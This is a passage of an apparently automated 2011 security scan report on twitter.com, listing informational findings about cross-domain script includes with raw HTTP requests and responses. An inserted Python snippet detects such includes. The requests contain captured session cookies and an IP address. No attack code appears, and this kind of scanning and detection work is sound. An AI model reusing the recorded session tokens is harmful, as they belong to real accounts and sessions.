<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.517. http://twitter.com/onlyjazz/status/29924505002446849

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /onlyjazz/status/29924505002446849

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlyjazz/status/29924505002446849 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224923-90834-17466
ETag: "5608c66aeb64567924807b23b0514ade"
Last-Modified: Fri, 28 Jan 2011 14:28:43 GMT
X-Runtime: 0.05594
Content-Type: text/html; charset=utf-8
Content-Length: 13806
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vb25seWphenov%250Ac3RhdHVzLzI5OTI0NTA1MDAyNDQ2ODQ5Ogxjc3JmX2lkIiVjZGY1NzI3MTNk%250ANzEzZDVmYzU1N2MyZWJiOTIxMWNhMzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--92541950a44bd04792a3b27273e15bc7882e2cca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.518. http://twitter.com/oschina

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oschina HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224927-42931-41515
ETag: "4ec91c8ea22a5f99253e904c27c6fcbf"
Last-Modified: Fri, 28 Jan 2011 14:28:47 GMT
X-Runtime: 0.00766
Content-Type: text/html; charset=utf-8
Content-Length: 42639
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.519. http://twitter.com/oschina/status/28102821484171264

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina/status/28102821484171264

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oschina/status/28102821484171264 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224931-1588-6053
ETag: "74e24e45fa1e508376ab48a014b754fb"
Last-Modified: Fri, 28 Jan 2011 14:28:51 GMT
X-Runtime: 0.05739
Content-Type: text/html; charset=utf-8
Content-Length: 13642
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJTEwZDU0OTEzNjYw%250AOWY1ZTk1YmNlOWQ5ZWI3Njc5ZjczOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--68179dfd893f83c3d5cc5cabbcfb96d9a300ec19; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.520. http://twitter.com/oschina/status/28102821484171264

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina/status/28102821484171264

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oschina/status/28102821484171264 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225138-13520-49440
ETag: "db1f37f1ae6d53b0a13a5f7aaacae199"
Last-Modified: Fri, 28 Jan 2011 14:32:18 GMT
X-Runtime: 0.05248
Content-Type: text/html; charset=utf-8
Content-Length: 13644
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJWQ3ZmEyOWM1YTA2%250AZTU0NWY3YmY5YmZlZDUzMGJmZWE3OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--2b378141cb3a0836741ec2d8ca9f0d86b32e1bbb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.521. http://twitter.com/oschina/status/30099933486915584

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina/status/30099933486915584

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234576-76529-15127
ETag: "312b58ddff1edbb51a56bb6099cd81f0"
Last-Modified: Fri, 28 Jan 2011 17:09:36 GMT
X-Runtime: 0.05464
Content-Type: text/html; charset=utf-8
Content-Length: 13590
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6FWluX25ld191c2VyX2Zsb3cwOgxj%250Ac3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoMdHpf%250AbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--367f8a178a971b6bee0ba3e37963c32d68bfb9a3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.522. http://twitter.com/oschina/status/30099933486915584

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina/status/30099933486915584

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224930-28853-36094
ETag: "f8b960d6a56094881d4f6783365ecf28"
Last-Modified: Fri, 28 Jan 2011 14:28:50 GMT
X-Runtime: 0.06167
Content-Type: text/html; charset=utf-8
Content-Length: 13721
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWZkOWU3MGFjNzg5%250ANmVhNjZmOTMxN2NlNjZmMGExNWNkOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--6d3f8e3e6d67d971b281da438de9b57a6477922e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
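The finding above is reproducible from the response body alone. The following is an added example, not part of the scanner report or of Twitter's code: a small Python check that parses the <script src> tags, keeps those whose registrable domain differs from the page's, and records what a reviewer would want to know about each one (host, scheme it is fetched over, presence of an integrity attribute). The sample body is constructed from the script tags visible in the response above, plus a relative and an inline script as controls; the trusted_domains allowlist (assumed here to hold twimg.com, Twitter's own asset CDN) and the two-label domain approximation are assumptions of this example.

```python
"""Detect cross-domain <script src> includes in an HTML response.

Added example, not part of the scanner report. It re-derives the finding
shown above from the response body: every external script is listed with
its host, the scheme it is fetched over, and whether it carries a
Subresource Integrity hash. A caller-supplied allowlist of domains the
site owner controls (assumed here: twimg.com) separates first-party CDNs
from true third parties such as ajax.googleapis.com.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the <script> tags visible in the /oschina/status
# response above, plus one relative and one inline script as controls.
SAMPLE_BODY = """
<html><head><meta charset="utf-8"></head><body>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="/javascripts/local.js" type="text/javascript"></script>
<script type="text/javascript">var inline = 1;</script>
</body></html>
"""

PAGE_URL = "http://twitter.com/oschina/status/30099933486915584"


class ScriptSrcParser(HTMLParser):
    """Collect (src, integrity) for every <script> that has a src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":          # HTMLParser lower-cases tag names
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append((a["src"], a.get("integrity")))


def registrable_domain(host):
    """Last two DNS labels, e.g. a1.twimg.com -> twimg.com.

    Assumption: no public-suffix list, so co.uk-style suffixes are
    misjudged; adequate for the .com hosts in this report.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def cross_domain_scripts(body, page_url, trusted_domains=frozenset()):
    """Return external scripts whose registrable domain differs from the page's.

    Domains in trusted_domains (owner-controlled CDNs) are skipped, so what
    remains is code executed in the page's origin but served by a third party.
    """
    page = urlsplit(page_url)
    page_domain = registrable_domain(page.hostname)
    parser = ScriptSrcParser()
    parser.feed(body)
    findings = []
    for src, integrity in parser.scripts:
        parts = urlsplit(src)
        if not parts.netloc:                   # relative URL: same origin
            continue
        domain = registrable_domain(parts.hostname)
        if domain == page_domain or domain in trusted_domains:
            continue
        findings.append({
            "src": src,
            "host": parts.hostname,
            "scheme": parts.scheme or page.scheme,  # protocol-relative -> page's
            "sri": integrity is not None,
        })
    return findings


def risk_notes(finding):
    """Human-readable reasons a reviewer would flag this include."""
    notes = ["runs with full access to the page's DOM and cookies"]
    if finding["scheme"] == "http":
        notes.append("fetched over plaintext HTTP, so modifiable in transit")
    if not finding["sri"]:
        notes.append("no integrity attribute, so a changed file is accepted")
    return notes


if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_BODY, PAGE_URL, {"twimg.com"}):
        print(f["host"], f["src"])
        for n in risk_notes(f):
            print("   -", n)
```

Run without an allowlist it reports the same set a scanner does (every twimg.com host counts as a different domain); with twimg.com allowlisted only ajax.googleapis.com and www.google.com remain, which is the part of the finding worth acting on, since a compromised or altered file on either host executes in the twitter.com origin. The integrity check is a present-day hardening test (SRI post-dates this 2011 report) and is included because it is the remediation a reviewer would ask for alongside moving the includes to HTTPS.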

18.523. http://twitter.com/oschina/status/30099933486915584

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /oschina/status/30099933486915584

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225138-33592-51661
ETag: "5f076aee8adb4cc818cea263f54525c4"
Last-Modified: Fri, 28 Jan 2011 14:32:18 GMT
X-Runtime: 0.05358
Content-Type: text/html; charset=utf-8
Content-Length: 13721
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWU5MTJmOTE0MDVh%250AYTQ5NTFjYzcyZmVlZDYwMDAwYjVmOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--a5d425c05ed0a2c47b3ad4f3d88984c56bb1b3bb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.524. http://twitter.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /privacy

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
